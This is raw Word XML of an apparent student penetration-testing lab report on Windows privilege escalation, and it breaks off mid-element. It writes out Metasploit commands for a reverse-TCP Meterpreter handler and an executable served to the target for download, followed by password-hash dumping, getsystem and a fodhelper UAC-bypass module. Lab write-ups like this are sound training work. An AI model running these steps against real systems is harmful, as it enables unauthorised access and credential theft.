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7E04" w14:textId="77777777" w:rsidR="00554F9E" w:rsidRDefault="00554F9E" w:rsidP="00554F9E">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411F4C19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68B74374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59A3BA5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792F94F5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31726B8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D94AD1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1BC1B715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71996509" w14:textId="77777777" w:rsidR="00554F9E" w:rsidRPr="00D16C8A" w:rsidRDefault="00554F9E" w:rsidP="00554F9E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24C6044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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87F57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Talo Harrison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E005D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Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87F57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PT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780C5F4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</w:p>
    <w:p w14:paraId="37CEEF1F" w14:textId="47F049CF" w:rsidR="002E49B0" w:rsidRDefault="00126EAB" w:rsidP="00554F9E">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00126EAB">
        <w:t xml:space="preserve">Lab – </w:t>
      </w:r>
      <w:r w:rsidR="009B1646">
        <w:t>Escalating Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3B6DC" w14:textId="3C17520A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Date: July </w:t>
      </w:r>
      <w:r w:rsidR="00126EAB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="009B1646">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="004D640C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323463FA" w14:textId="09F4E536" w:rsidR="00126EAB" w:rsidRPr="00126EAB" w:rsidRDefault="00554F9E" w:rsidP="00126EAB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-ZW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E9AC4" w14:textId="6799DDB6" w:rsidR="00554F9E" w:rsidRDefault="00126EAB" w:rsidP="00126EAB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126EAB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-ZW"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab –</w:t>
      </w:r>
      <w:r w:rsidR="009B1646">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-ZW"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalating Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACCB17" w14:textId="65BE5D08" w:rsidR="00AA302C" w:rsidRDefault="00126EAB" w:rsidP="00126EAB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Attack Platform: Kali </w:t>
      </w:r>
      <w:r w:rsidRPr="00126EAB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00016D79">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0.9.51.40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7161C687" w14:textId="44DC5EC5" w:rsidR="00126EAB" w:rsidRDefault="00016D79" w:rsidP="00126EAB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5768186" wp14:editId="6A6F249C">
            <wp:extent cx="5731510" cy="5462905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="19013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11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D02B" w14:textId="77777777" w:rsidR="00126EAB" w:rsidRDefault="00126EAB" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E147A26" w14:textId="6F379252" w:rsidR="00016D79" w:rsidRDefault="00016D79" w:rsidP="00126EAB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Creating the backdoor in Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC11B5" w14:textId="78161F55" w:rsidR="00027EC7" w:rsidRDefault="00586895" w:rsidP="00126EAB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3BCF645" wp14:editId="747BA4DD">
            <wp:extent cx="5731510" cy="1829435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="210360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07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6585" w14:textId="1F962FEB" w:rsidR="00027EC7" w:rsidRDefault="00027EC7" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00027EC7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F818E6C" wp14:editId="7E2F9EC7">
            <wp:extent cx="2325226" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="290429263" name="Picture 1" descr="A computer keyboard with a white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29263" name="Picture 1" descr="A computer keyboard with a white gea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655" cy="20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848C" w14:textId="49DD9262" w:rsidR="00126EAB" w:rsidRPr="002F5B57" w:rsidRDefault="002F5B57" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5B57">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EABAB67" w14:textId="0643B75A" w:rsidR="002F5B57" w:rsidRDefault="002F5B57" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5B57">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EDDBB5A" wp14:editId="7F2C4FA4">
            <wp:extent cx="5731510" cy="2183765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="84893759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37594" name="Picture 1" descr="A computer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3FC2" w14:textId="77777777" w:rsidR="002F5B57" w:rsidRDefault="002F5B57" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1202B091" w14:textId="77777777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┌──(kirui</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:eastAsia="Malgun Gothic" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C717D" w14:textId="77777777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└─$ sudo mkdir /var/www/html/share/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736771C6" w14:textId="77777777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┌──(kirui</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:eastAsia="Malgun Gothic" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62849FA8" w14:textId="77777777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└─$ sudo chmod -R 755 /var/www/html/share/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01943F9E" w14:textId="77777777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┌──(kirui</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:eastAsia="Malgun Gothic" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F594E37" w14:textId="77777777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└─$ sudo chown -R www-data:www-data /var/www/html/share/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C5829" w14:textId="77777777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┌──(kirui</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:eastAsia="Malgun Gothic" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F071B" w14:textId="77777777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└─$ ls -la /var/www/html/ | grep share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50706FAC" w14:textId="77777777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drwxr-xr-x  2 www-data www-data  4096 Jul 17 18:44 share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E9F5E3" w14:textId="77777777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┌──(kirui</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:eastAsia="Malgun Gothic" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348ABC2A" w14:textId="77777777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└─$ sudo cp Exploit.exe /var/www/html/share/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC7865" w14:textId="77777777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┌──(kirui</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:eastAsia="Malgun Gothic" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kali)-[~/Desktop]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9EAD1C" w14:textId="1989431A" w:rsidR="002F1902" w:rsidRPr="002F1902" w:rsidRDefault="002F1902" w:rsidP="002F1902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>└─$ sudo service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA8C82" w14:textId="23B04270" w:rsidR="002F5B57" w:rsidRDefault="002F1902" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman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F18693" wp14:editId="7FBE7B21">
            <wp:extent cx="5731510" cy="4909820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="18878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1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B2F6" w14:textId="77777777" w:rsidR="002F1902" w:rsidRDefault="002F1902" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1FDB0F" w14:textId="77777777" w:rsidR="002F1902" w:rsidRDefault="002F1902" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC7FFFB" w14:textId="713A9B60" w:rsidR="002F1902" w:rsidRPr="002F1902" w:rsidRDefault="002F1902" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Performing Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D83B20" w14:textId="1654B688" w:rsidR="00126EAB" w:rsidRDefault="002F1902" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Starting the Metasploit framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C6CEF" w14:textId="1CA06DC0" w:rsidR="002F1902" w:rsidRDefault="001A201A" w:rsidP="00126EAB">
      <w:pPr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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CDE113" w14:textId="02EEB8E9" w:rsidR="001A201A" w:rsidRDefault="001A201A" w:rsidP="00126EAB">
      <w:pPr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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD36DC" w14:textId="52EDA73F" w:rsidR="001A201A" w:rsidRDefault="001A201A" w:rsidP="00126EAB">
      <w:pPr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set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722FED58" w14:textId="5FE8E711" w:rsidR="001A201A" w:rsidRDefault="001A201A" w:rsidP="00126EAB">
      <w:pPr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set LHOST 10.9.51.40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF38A0B" w14:textId="2E54B69F" w:rsidR="001A201A" w:rsidRDefault="001A201A" w:rsidP="00126EAB">
      <w:pPr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exploit -j -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF726DE" w14:textId="77777777" w:rsidR="001A201A" w:rsidRPr="001A201A" w:rsidRDefault="001A201A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4543757B" w14:textId="56491EC9" w:rsidR="002F1902" w:rsidRDefault="002F1902" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1902">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2EE9CC" wp14:editId="388A68E9">
            <wp:extent cx="5731510" cy="5093970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1724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5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F4DD" w14:textId="77777777" w:rsidR="00126EAB" w:rsidRDefault="00126EAB" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB5DA76" w14:textId="4F53771D" w:rsidR="002F1902" w:rsidRDefault="007D5705" w:rsidP="00126EAB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00D782A" wp14:editId="6630D56A">
            <wp:extent cx="5731510" cy="2268855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="122740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07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0B60" w14:textId="77777777" w:rsidR="002F1902" w:rsidRDefault="002F1902" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7026ED2E" w14:textId="77777777" w:rsidR="007D5705" w:rsidRDefault="007D5705" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27447DF9" w14:textId="77777777" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F747B49" w14:textId="12371445" w:rsidR="000E544A" w:rsidRPr="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E544A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Run the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1651DFA6" w14:textId="13F90F29" w:rsidR="000E544A" w:rsidRPr="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E544A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://10.9.51.40/share/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C56D0" w14:textId="51521DD3" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB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64F150D" wp14:editId="0478959D">
            <wp:extent cx="5731510" cy="5880100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="4334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07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8C67" w14:textId="77777777" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580ACDBF" w14:textId="0C1F176B" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Opening the executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5866938E" w14:textId="3823D8B4" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman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3D5558" wp14:editId="547324BC">
            <wp:extent cx="5731510" cy="4279900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="85908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80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8ECD" w14:textId="77777777" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267D02D2" w14:textId="663C2C59" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Meterpreter session successfully opened:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62032582" w14:textId="6AED9FED" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB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91D4713" wp14:editId="7A44E1B9">
            <wp:extent cx="5731510" cy="384175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="94509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93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0223" w14:textId="77777777" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C211AAA" w14:textId="56F1ECDB" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB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A187DA7" wp14:editId="146F5767">
            <wp:extent cx="5731510" cy="1344295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="142297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76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EC0C" w14:textId="77777777" w:rsidR="000E544A" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F37B499" w14:textId="06856A23" w:rsidR="00F53294" w:rsidRPr="00F53294" w:rsidRDefault="00F53294" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F53294">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F53294">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491BC56E" w14:textId="4745691A" w:rsidR="00F53294" w:rsidRPr="00747B50" w:rsidRDefault="000E544A" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747B50">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D8B20B" wp14:editId="52F19E1A">
            <wp:extent cx="5731510" cy="883920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149254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48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DD68" w14:textId="29820107" w:rsidR="00747B50" w:rsidRDefault="00747B50" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00747B50">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>run post/windows/gather/smart_hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B452D0" w14:textId="3A8DBE9D" w:rsidR="000E544A" w:rsidRDefault="00F53294" w:rsidP="00126EAB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AD66EBD" wp14:editId="632A9D2B">
            <wp:extent cx="5731510" cy="1141095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="140956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66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0106" w14:textId="77777777" w:rsidR="00F53294" w:rsidRDefault="00F53294" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F92DC5B" w14:textId="7AE8DBCC" w:rsidR="00F53294" w:rsidRDefault="00F53294" w:rsidP="00126EAB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On trying to escalate privileges using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F53294">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getsystem -t 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEDF977" w14:textId="64C4FBF4" w:rsidR="00F53294" w:rsidRDefault="00F53294" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F53294">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7402AB9C" wp14:editId="29C55EFA">
            <wp:extent cx="5731510" cy="883285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="140423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37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D14C" w14:textId="77777777" w:rsidR="00F53294" w:rsidRDefault="00F53294" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA11E98" w14:textId="404573C7" w:rsidR="00F53294" w:rsidRPr="00F53294" w:rsidRDefault="00F53294" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F53294">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Perform Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D133C" w14:textId="57714DC6" w:rsidR="00F53294" w:rsidRDefault="00F53294" w:rsidP="00126EAB">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bypassusac_fodhelper: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F53294">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>use exploit/windows/local/bypassuac_fodhelper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC511CD" w14:textId="5526C591" w:rsidR="00F53294" w:rsidRDefault="008A21B8" w:rsidP="00126EAB">
      <w:r w:rsidRPr="008A21B8">
